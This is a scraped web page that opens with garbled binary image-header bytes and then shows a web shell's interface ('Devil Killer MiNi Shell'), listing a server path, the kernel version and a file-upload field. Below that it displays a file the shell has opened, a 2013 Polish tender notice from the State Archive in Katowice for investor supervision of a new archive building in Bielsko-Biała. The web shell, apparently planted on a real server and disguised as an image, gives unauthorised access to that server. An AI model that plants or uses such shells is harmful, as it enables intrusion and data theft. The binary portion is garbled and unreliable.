JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131223/533302-N-2013.html

<p class="kh_header"><b>Katowice: Świadczenie usług nadzoru inwestorskiego nad robotami budowlanymi obejmującymi inwestycję - budowa budynku Archiwum Państwowego w Katowicach Oddział w Bielsku-Białej przy ul. Piłsudskiego 39, (działka nr 910).</b><br>
<b>Numer ogłoszenia: 533302 - 2013; data zamieszczenia: 23.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Archiwum Państwowe w Katowicach , ul. Józefowska 104, 40-145 Katowice, woj. śląskie, tel. 0-32  208 78 01, faks 0-32 208 78 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ap.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług nadzoru inwestorskiego nad robotami budowlanymi obejmującymi inwestycję - budowa budynku Archiwum Państwowego w Katowicach Oddział w Bielsku-Białej przy ul. Piłsudskiego 39, (działka nr 910)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623) nad wykonywaniem robót budowlanych realizowanych w ramach zadania: Roboty budowlane pn. Budowa budynku Archiwum Państwowego w Katowicach Oddział w Bielsku-Białej przy ul. Piłsudskiego 39, Bielsko-Biała (działka nr 910), które stanowi przedsięwzięcie inwestycyjne polegające na budowie obiektu budowlanego w postaci budynku Archiwum Państwowego w Katowicach Oddział w Bielsku Białej wraz z instalacjami i infrastrukturą techniczną niezbędną dla jego funkcjonowania. 
Zamawiający wskazuje w tym miejscu, że wartość łączna brutto części robót budowlanych wchodzących w skład inwestycji na lata 2014 - 2015, wynosi 6.833.368,00 zł.

Wykonawca będzie odpowiedzialny za zapewnienie profesjonalnego nadzoru inwestorskiego, technicznego i kontroli z ramienia Zamawiającego nad realizacją obiektu oraz prowadzenie kontroli zgodności wykonywanych robót z Projektem Wykonawczym, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych oraz kosztorysem ofertowym jak również wydanymi decyzjami administracyjnymi, przepisami prawa oraz zasadami wiedzy inżynierskiej, w tym kontroli materiałów i urządzeń, które będą niezbędne do realizacji obiektu, za pomocą Zespołu Inspektorów Nadzoru Branżowego, z których jeden ustanowiony zostanie koordynatorem w rozumieniu przepisu art. 27 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (Dz. U. Nr 89, poz. 414 z późn. zm.).

Do celów poniższych Wykonawca robót budowlanych w zakresie inwestycji pn.: Roboty budowlane pn. Budowa budynku Archiwum Państwowego w Katowicach Oddział w Bielsku-Białej przy ul. Piłsudskiego 39, Bielsko-Biała (działka nr 910) zwany będzie Wykonawcą Robót zaś Zamawiający zwany będzie również Inwestorem 

I.	Obowiązki pełniącego kompleksowy nadzór inwestorski nad robotami wykonawczymi związanych z budową:
Zakres czynności wchodzący w zakres nadzoru inwestorskiego zgodnie z art. 25 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (jednolity tekst z 2010 Dz. U. Nr 243, poz. 1623 z późn. zm.):
1.	reprezentowanie Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
2.	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
3.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
4.	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie Inwestora, kontrolowanie rozliczeń budowy.

Czynności przed rozpoczęciem realizacji budowy
1.	sprawdzenie kosztorysów inwestorskich obejmujących wszystkie projekty branżowe (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych);
2.	sprawdzenie dokumentacji projektowej pod kątem zgodności z obowiązującymi przepisami, w szczególności acz nie wyłącznie ustawą Prawo budowlane z dnia 7 lipca 1994 r. (Dz. U. Nr 89, poz. 414 z późn. zm.), normami techniczno-budowlanymi i pod kątem kompletności z punktu widzenia celu któremu ma służyć;
3.	ustalenie zasad kontroli robót i materiałów wbudowanych - uzgodnienie z Inwestorem i Generalnym Wykonawcą instrukcji planu zapewnienia jakości realizowanych robót;
4.	stosowanie, w zakresie dokumentów niezbędnych dla dokonywania przeglądów technicznych, odbiorów częściowych i odbioru końcowego budowy, postanowień umowy z Wykonawcą Robót ;
5.	opiniowanie harmonogramu realizacji budowy;

Czynności w okresie realizacji budowy
1.	Bieżący nadzór nad zgodnością wykonywania robót z harmonogramem realizacji budowy.
2.	Przedstawianie Inwestorowi (Dyrektorowi Archiwum Państwowego w Katowicach oraz Głównemu Księgowemu Archiwum) ustnych relacji z postępu prac (3) trzy razy w tygodniu w siedzibie Archiwum Państwowego w Katowicach.
3.	Przedstawianie w formie pisemnej miesięcznych raportów z zaawansowania całości robót w odniesieniu do harmonogramu realizacji robót Wykonawcy Robót zatrudnionego przez Inwestora, wraz z przedstawianiem ewentualnych problemów i zagrożeń związanych z realizacją inwestycji, ze szczególnym uwzględnieniem ustaleń z cotygodniowych spotkań koordynacyjnych z  Wykonawcą Robót i Podwykonawcami, Projektantami i Inspektorami.
4.	Bieżące informowanie Inwestora (oraz dokonywanie odpowiednich wpisów do Dziennika Budowy) o wszelkich zagrożeniach dla terminowej realizacji budowy i innych zdarzeniach mających wpływ na realizację budowy i mogących narazić Inwestora na straty finansowe lub rzeczowe.
5.	Współpraca z Nadzorem Autorskim i egzekwowanie w imieniu Inwestora od Projektanta obowiązków wynikających z umowy zawartej z Projektantem, a w szczególności czynności nadzoru autorskiego nad wykonywaną przez niego dokumentacją projektową w zakresie:
a.	uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej zgłoszonych przez Inwestora, Wykonawcę lub Nadzór Inwestorski;
b.	uzupełnienia dokumentacji i wyjaśnienia wątpliwości zgodnie z potrzebami realizacji Projektu.
6.	Sprawdzenie zgodności wykonanych robót z zatwierdzoną dokumentacją, standardami oraz warunkami pozwolenia na budowę, projektami wykonawczymi  i zasadami bezpieczeństwa.
7.	Bieżąca kontrola jakości wykonywanych robót oraz dokumentów: atestów i świadectw jakości dla materiałów wbudowywanych, kompletowanie na bieżąco dokumentacji powykonawczej.
8.	Sprawdzenie zgodności urządzeń, materiałów i elementów z wymaganymi certyfikatami i świadectwami wyrobów, deklaracjami zgodności.
9.	Udział w odbiorach technicznych robót, instalacji, urządzeń, elementów itd. należących do kompetencji urzędów lub instytucji państwowych - w zakresie inwestycji przekazywane na bieżąco.
10.	Kontrola prawidłowej kompletacji przez Wykonawcę Robót dokumentacji budowy.
11.	Uczestnictwo w naradach koordynacyjnych i spotkaniach roboczych na budowie w częstotliwości zgodnej z postanowieniami umowy z Wykonawcą Robót oraz udział w pracach komisji związanych z budową, sprawdzanie czy wykonywane są zalecenia z poprzednich narad.
12.	Dokonywanie rzetelnej, zgodnej ze stanem faktycznym kontroli zaawansowania prac.
13.	Weryfikacja przedstawionych przez Wykonawcę Robót ew. protokołów konieczności i ilości robót na prace zaniechane, zamienne i dodatkowe.
14.	Opiniowanie wniosków na roboty dodatkowe i zamienne zgłaszane przez Inwestora lub Wykonawcę Robót.
15.	Opiniowanie wniosków Wykonawcy Robót w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, maszyn i urządzeń.
16.	Dokonywanie wpisów dokumentujących stan faktyczny realizacji budowy, egzekwowanie zaleceń dla Wykonawcę Robót.
17.	Uczestnictwo w odbiorach częściowych bądź etapowych, budowy zgodnie z umową zawartą przez Inwestora z Wykonawcą Robót.
18.	Przygotowanie listy wad i usterek oraz potwierdzenie ich usunięcia. 
19.	Prowadzenie nadzoru nad usuwaniem przez Wykonawcę Robót usterek i sporządzenie odpowiedniego protokołu. 
20.	Wyegzekwowanie od Wykonawcy Robót kompletu dokumentów niezbędnych do przeprowadzenia Odbioru Końcowego. Współpraca przy ustaleniu wymagań dla dokumentacji powykonawczej opracowanej i kompletowanej przez Wykonawcę Robót - projekty powykonawcze, protokoły badań, sprawdzeń i pomiarów, certyfikaty i atesty, instrukcje obsługi, eksploatacji, dokumenty DTR itd. 
21.	Wydawanie Kierownikowi budowy lub Kierownikowi robót poleceń potwierdzonych wpisem do Dziennika Budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także tych wymagających odkrycia robót lub elementów podlegających odbiorowi częściowemu, przygotowanie dokumentów do odbioru końcowego lub rozruchu.
22.	Sprawdzenie przedłożonej do odbioru dokumentacji powykonawczej i jej potwierdzenie ze stanem faktycznym wykonanych robót. 
23.	Przestrzeganie i kontrola stosowania przez uczestników procesu budowy ustalonych procedur instrukcji i dokumentów oraz przepisów BHP w zakresie nadzorowanych robót.

Czynności związane z odbiorem końcowym i przekazaniem obiektu do użytkowania 
1.	 	Przeprowadzanie inspekcji, dokonywanie protokolarnych odbiorów robót, zamontowanych urządzeń łącznie ze sprawdzeniem testów rozruchu, wskazaniem ewentualnych braków i usterek oraz ustaleniem zasad i terminów ich usunięcia i ponownego rozruchu. 
2.	 	Udział w próbach technicznych oraz odbiorach gotowego obiektu.
3.	 	Opracowanie opinii dotyczących wad zrealizowanych robót uznanych za nie nadające się do usunięcia. 
4.	 	Potwierdzenie wniesionego do Dziennika Budowy wpisu o zakończeniu robót i stanie gotowości do Odbioru Końcowego obiektu. 
5.	 	Udział w czynnościach Odbioru Końcowego, a także w czynnościach koniecznych do uzyskania ostatecznej decyzji o przekazaniu obiektu do użytkowania. 
6.	 	Nadzór nad przygotowaniem dokumentów niezbędnych do złożenia przez Generalnego Wykonawcę wniosku o uzyskanie  pozwolenia na użytkowanie wraz z wymaganymi przepisami prawa uzgodnieniami i oświadczeniami odpowiednich organów.
7.	 	Nadzór nad usuwaniem usterek stwierdzonych w Protokole Odbioru Końcowego i komisyjne potwierdzenie ich usunięcia. 
8.	 	Doprowadzenie do odbioru końcowego inwestycji, udział w komisjach odbiorowych i przekazaniu inwestycji do eksploatacji przy założeniu, że odbierającym jest Zamawiający.

II.	Obowiązki personelu Wykonawcy Nadzoru Inwestorskiego:
1.	Wymagania ogólne
1.	Wykonawca Nadzoru powoła Zespół Nadzoru, złożony z inspektorów zdolnych do prowadzenia powierzonych czynności i uprawnionych do pełnienia przewidzianej dla nich funkcji.
2.	Zespołem Nadzoru będzie kierował Koordynator Zespołu, ustanowiony, zgodnie przepisem art. 27 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (Dz. U. Nr 89, poz. 414 z późn. zm.), spośród członków Zespołu Nadzoru.
3.	Zamawiający nie ogranicza liczby członków Zespołu Nadzoru. Jeżeli Wykonawca Nadzoru uzna za konieczne lub stosowne przedstawienie Zamawiającemu dodatkowych osób, które mogą być niezbędne do właściwego wykonania przedmiotu zamówienia winien to uczynić. 
4.	W celu wykonania obowiązków Wykonawca Nadzoru powinien zapewnić co najmniej następujący personel:
- Inspektor Nadzoru - specjalista w zakresie robót konstrukcyjno-budowlanych
- Inspektor Nadzoru - specjalista w zakresie robót instalacji sanitarnych oraz przyłączy zewnętrznych
- Inspektor Nadzoru - specjalista w zakresie robót elektroenergetycznych i teletechnicznych
5.	Przedstawiony skład Zespołu może ulec zmianie po akceptacji ze strony Zamawiającego w przypadkach niezależnych od Wykonawcy, powodów dyscyplinarnych, ewentualnych zmianach organizacyjnych lub innych zdarzeń nie dających się przewidzieć w chwili zawierania umowy - na warunkach wskazanych w SIWZ.

2.	Zakres czynności Inspektora Nadzoru robót konstrukcyjno-budowlanych:

Pierwszy etap obejmować będzie nadzór inwestorski nad robotami budowlanymi realizowane zgodnie z postanowieniami umowy z Wykonawcą Robót oraz z polskim prawem budowlanym i przepisami z nim związanymi zasadami wiedzy technicznej:

1. 	Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniami na budowę
2. 	Monitorowanie postęp prac włącznie ze składaniem z nich raportów
3. 	Uzgadniania, w trakcie realizacji robót, zmian w dokumentacji projektowej z Projektantami, Wykonawcą Robót i Zamawiającym.
4. 	Pełnienie nadzoru w zakresie robót konstrukcyjno - budowlanych.
5. 	Uzgadnianie z Zamawiającym zasadniczych spraw mających wpływ na jakość, termin i koszty realizacji inwestycji.
6. 	Weryfikacja okresowych protokołów rzeczowo-finansowych  robót przedstawianych przez Wykonawcę Robót 
7. 	Uzgadnianie z Zamawiającym konieczność ewentualnego wykonania robót zamiennych lub dodatkowych,
8. 	Sprawdzenie i zatwierdzania kalkulacji robót dodatkowych i zamiennych (gdy takie wystąpią) dostarczanych przez wykonawców 
9. 	Sporządzanie i przedstawianie do zatwierdzenia przez Zamawiającego protokołów konieczności na roboty dodatkowe i zamienne.
10. 	Przygotowania do odbiorów częściowych inwestycji obejmujących również roboty zanikowe.
11. 	Prowadzenie i przechowywanie korespondencji z podmiotami biorącymi udział w realizacji umowy na roboty budowlane z Wykonawcą Robót ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do Wykonawcy Robót mogących być dowodami w razie ewentualnych sporów, roszczeń Wykonawcy Robót, katastrof budowlanych itp.

Drugi etap obejmować będzie czynności związane z odbiorem końcowym oraz rozliczeniem inwestycji w tym: 
12. 	Zebranie i skompletowanie dokumentacji powykonawczej przekazanej przez Wykonawcę Robót w tym oświadczenie kierownika budowy o zgodności wykonania robot budowlanych zgodnie z projektem budowlanym i warunkami pozwolenia na budowę oraz przepisami techniczno-budowlanymi
13. 	zebranie niezbędnych zaświadczeń odbiorów technicznych, prób oraz pomiarów instalacyjnych i funkcjonalnych.
14. 	wykonanie przeglądów przed odbiorczych.
15. 	uczestnictwa w komisji odbioru końcowego inwestycji.
16. 	rozliczenia końcowego inwestycji w zakresie wykonywanych robót konstrukcyjno - budowlanych

3.	Zakres czynności Inspektora Nadzoru Robót elektroenergetycznych:
Pierwszy etap obejmować będzie nadzór inwestorski nad robotami budowlanymi realizowane zgodnie z postanowieniami umowy z Wykonawcą Robót oraz z polskim prawem budowlanym i przepisami z nim związanymi zasadami wiedzy technicznej:

1.  Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z  projektem i pozwoleniami na budowę
2.   	Monitorowanie postępu prac włącznie ze składaniem z nich raportów
3.    Uzgadniania, w trakcie realizacji robót, zmian w dokumentacji projektowej z projektantami, wykonawcami robót i Zamawiającym.
4.   Pełnienie nadzoru w zakresie robót elektroenergetycznych.
5.   Uzgadnianie z Zamawiającym zasadniczych spraw mających wpływ na jakość, termin i koszty realizacji inwestycji.
6. 	Weryfikacja okresowych protokołów rzeczowo-finansowych  robót przedstawianych przez Wykonawcę Robót 
7. 	Uzgadnianie Zamawiającym konieczność ewentualnego wykonania robót dodatkowych lub zamiennych,
8. 	Sprawdzenie i zatwierdzania kalkulacji robót dodatkowych i zamiennych (gdy takie wystąpią) dostarczanych przez wykonawców 
9. 	Sporządzanie i przedstawianie do zatwierdzenia przez Zamawiającego protokołów konieczności na roboty dodatkowe i zamienne.
10. 	Przygotowania do odbiorów częściowych inwestycji obejmujących również roboty zanikowe
11. 	Prowadzenie i przechowywanie korespondencji z podmiotami biorącymi udział w realizacji umowy na roboty budowlane z Wykonawcą Robót ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do Wykonawcy Robót mogących być dowodami w razie ewentualnych sporów, roszczeń Wykonawcy Robót, katastrof budowlanych itp.

Drugi etap obejmować będzie czynności związane z odbiorem końcowym oraz rozliczeniem inwestycji w tym: 
12. 	Zebranie i skompletowanie dokumentacji powykonawczej przekazanej przez Wykonawcę Robót w tym oświadczenie kierownika budowy o zgodności wykonania robot budowlanych zgodnie z projektem budowlanym i warunkami pozwolenia na budowę oraz przepisami techniczno-budowlanymi
13. 	zebranie niezbędnych zaświadczeń odbiorów technicznych, prób oraz pomiarów instalacyjnych i funkcjonalnych.
14. 	wykonanie przeglądów przedodbiorowych.
15. 	uczestnictwa w komisji odbioru końcowego inwestycji.
16. 	Rozliczenia końcowego inwestycji w zakresie wykonywanych robót elektrycznych.

4.	Zakres czynności Inspektora Nadzoru robót instalacji sanitarnych oraz przyłączy zewnętrznych:
Pierwszy etap obejmować będzie nadzór inwestorski nad robotami budowlanymi realizowane zgodnie z postanowieniami umowy z Wykonawcą Robót oraz z polskim prawem budowlanym i przepisami z nim związanymi zasadami wiedzy technicznej:
1.   	Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniami na budowę
2. 	Monitorowanie postęp prac włącznie ze składaniem z nich raportów
3. 	Uzgadniania, w trakcie realizacji robót, zmian w dokumentacji projektowej z projektantami, Wykonawcą Robót i Zamawiającym.
4. 	Pełnienie nadzoru w zakresie robót instalacji sanitarnych, wentylacji i klimatyzacji oraz przyłączy zewnętrznych.
5. 	Uzgadnianie z Zamawiającym zasadniczych spraw mających wpływ na jakość, termin i koszty realizacji inwestycji.
6. 	Weryfikacja okresowych protokołów rzeczowo-finansowych  robót przedstawianych przez Wykonawcę Robót 
7. 	Uzgadnianie z Zamawiającym konieczność ewentualnego wykonania robót dodatkowych lub zamiennych,
8.	Sprawdzenie i zatwierdzania kalkulacji robót dodatkowych i zamiennych (gdy takie wystąpią) dostarczanych przez Wykonawcę Robót
9. 	Sporządzanie i przedstawianie do zatwierdzenia przez Zamawiającego protokołów konieczności na roboty dodatkowe i zamienne.
10. 	Przygotowania do odbiorów częściowych inwestycji obejmujących również roboty zanikowe.
11. 	Prowadzenie i przechowywanie korespondencji z podmiotami biorącymi udział w realizacji umowy na roboty budowlane z Wykonawcą Robót ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do Wykonawców mogących być dowodami w razie ewentualnych sporów, roszczeń Wykonawcy Robót, katastrof budowlanych itp.

Drugi etap obejmować będzie czynności związane z odbiorem końcowym oraz rozliczeniem inwestycji w tym: 
12. 	Zebranie i skompletowanie dokumentacji powykonawczej przekazanej przez Wykonawcę Robót w tym oświadczenie kierownika budowy o zgodności wykonania robot budowlanych zgodnie z projektem budowlanym i warunkami pozwolenia na budowę oraz przepisami techniczno-budowlanymi
13. 	zebranie niezbędnych zaświadczeń odbiorów technicznych, prób oraz pomiarów instalacyjnych i funkcjonalnych.
14. 	wykonanie przeglądów przed odbiorczych.
15. 	uczestnictwa w komisji odbioru końcowego inwestycji.
16. 	Rozliczenia końcowego inwestycji w zakresie wykonywanych robót instalacji sanitarnych, wentylacji i klimatyzacji oraz przyłączy zewnętrznych.

5. zakres czynności Koordynatora Zespołu Nadzoru:
1.	opiniowanie przedstawionego przez Wykonawcę Robót Harmonogramu rzeczowo - finansowego oraz tabel elementów scalonych stanowiącego podstawę rozliczeń opisanych i uaktualnionych Harmonogramów w celu ich akceptacji przez Zamawiającego;
2.	opiniowanie wniosków Wykonawcy Robót na wykonanie robot zamiennych.
3.	organizowanie przez Koordynatora Zespołu prac związanych z nadzorem tak, aby z tego tytułu nie było zbędnych przerw w realizacji robot przez Wykonawcę Robót;
4.	kontrolowanie przez Koordynatora Zespołu realizacji Harmonogramu rzeczowo- finansowego;
5.	kontrolowanie przestrzegania przez Wykonawcę Robót zasad BHP, oraz planu BIOZ.
6.	wstrzymanie przez Koordynatora Zespołu dalszych robot budowlanych w przypadku, gdy ich kontynuacja może wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z Projektem Wykonawczym , pozwoleniem na budowę , przepisami BHP lub planem BIOZ.
7.	bieżące informowanie Zamawiającego o zaistniałych sporach lub problemach;
8.	usuwanie w terminach określonych przez Zamawiającego stwierdzonych nieprawidłowości.
9.	wnioskowanie do Zamawiającego o zlecenie usunięcia wad stronie trzeciej w przypadku, gdy Wykonawca Robot nie usunie ich w uzgodnionym terminie
10.	całkowite rozliczenie zrealizowanych robot budowlanych w przypadku odstąpienia od umowy zawartej przez Zamawiającego z Wykonawcą Robót
11.	zlecanie przez Koordynatora Zespołu Wykonawcy Robót wykonanie prac niezbędnych ze względu na zagrożenie Życia i bezpieczeństwa osób lub zabezpieczenie przed awarią, zawiadamiając o tym niezwłocznie Zamawiającego.
12.	zlecanie, po aprobacie Zamawiającego niezalenych opinii i ekspertyz prawnych i technicznych dotyczących wykonywanych robot jeżeli uzna je za konieczne
13.	składanie sprawozdań z realizacji robot budowlanych dla Zamawiającego na koniec każdego miesiąca.
14.	stwierdzenie i poświadczenie zakończenia robot, sprawdzenie kompletności i prawidłowości dokumentacji odbiorczej i przedłożenie do akceptacji Zamawiającego w celu ustalenia terminu odbioru częściowego lub końcowego.
15.	sprawdzenie ostatecznej kwoty należnej Wykonawcy Robót, ustalenia i wnioskowania zakresu koniecznych korekt wyliczeń i przedstawienia Zamawiającemu do podjęcia decyzji o ostatecznej wysokości tej kwoty.
16.	dopilnowanie zabezpieczenia przez Wykonawcę Robót terenu budowy w przypadku odstąpienia od umowy zawartej przez Zamawiającego z Wykonawcą Robót
17.	podjęcie przez Koordynatora Zespołu niezbędnych działań celem ochrony Zamawiającego przed podwójną płatnością wynagrodzenia za roboty ewentualnych podwykonawców w sytuacji przewidzianej w przepisie art. 647 (1) ustawy Kodeks Cywilny
18.	sporządzenie i przygotowanie wszystkich niezbędnych dokumentów potrzebnych do uzyskania pozwolenia na użytkowanie, (pełnomocnikiem Zamawiającego jako wnioskodawcy będzie Wykonawca Robót).
19.	ewentualne uczestniczenie w przeglądach gwarancyjnych
20.	umożliwienie przez Koordynatora Zespołu przeprowadzenia kontroli i uczestniczenie we wszelkich kontrolach przeprowadzonych przez osoby prawem upoważnione, udzielanie potrzebnych wyjaśnień i przygotowanie wymaganych przez kontrolujących dokumentów
21.	świadczenie doradztwa fachowego dla Zamawiającego przez cały okres wykonywania umowy z Wykonawcą Robót 
22.	obowiązek informowania Zamawiającego o zmianach w zakresie prawa budowanego, normach i innych pozafinansowych zmianach prawnych w zakresie dotyczącym realizacji nowego obiektu Archiwum Państwowego w Katowicach Oddział w Bielsku - Białej,
23.	dokumentowanie realizacji budowy i rozliczeń finansowych przez Koordynatora Zespołu, w tym m.in.: prowadzenie przez Koordynatora Zespołu dokumentacji budowy przewidzianej prawem i mające wpływ na przebieg i finansowanie realizacji budowy obiektu Archiwum Państwowego w Katowicach Oddział w Bielsku - Białej oraz przekazywanie jej Zamawiającemu
24.	poczynając od daty zawarcia umowy z Zamawiającym o wykonanie zamówienia publicznego objętego niniejszą SIWZ Koordynator Zespołu Inspektorów Nadzoru w każdy kolejny następujący po sobie miesiąc kalendarzowy będzie składał do 10 dnia tego miesiąca raport miesięczny.
Raport miesięczny musi zawierać:
o 	analizę działań prowadzonych przez członków Zespołu Inspektorów Nadzoru w raportowanym okresie i narastająco od rozpoczęcia realizacji zdań,
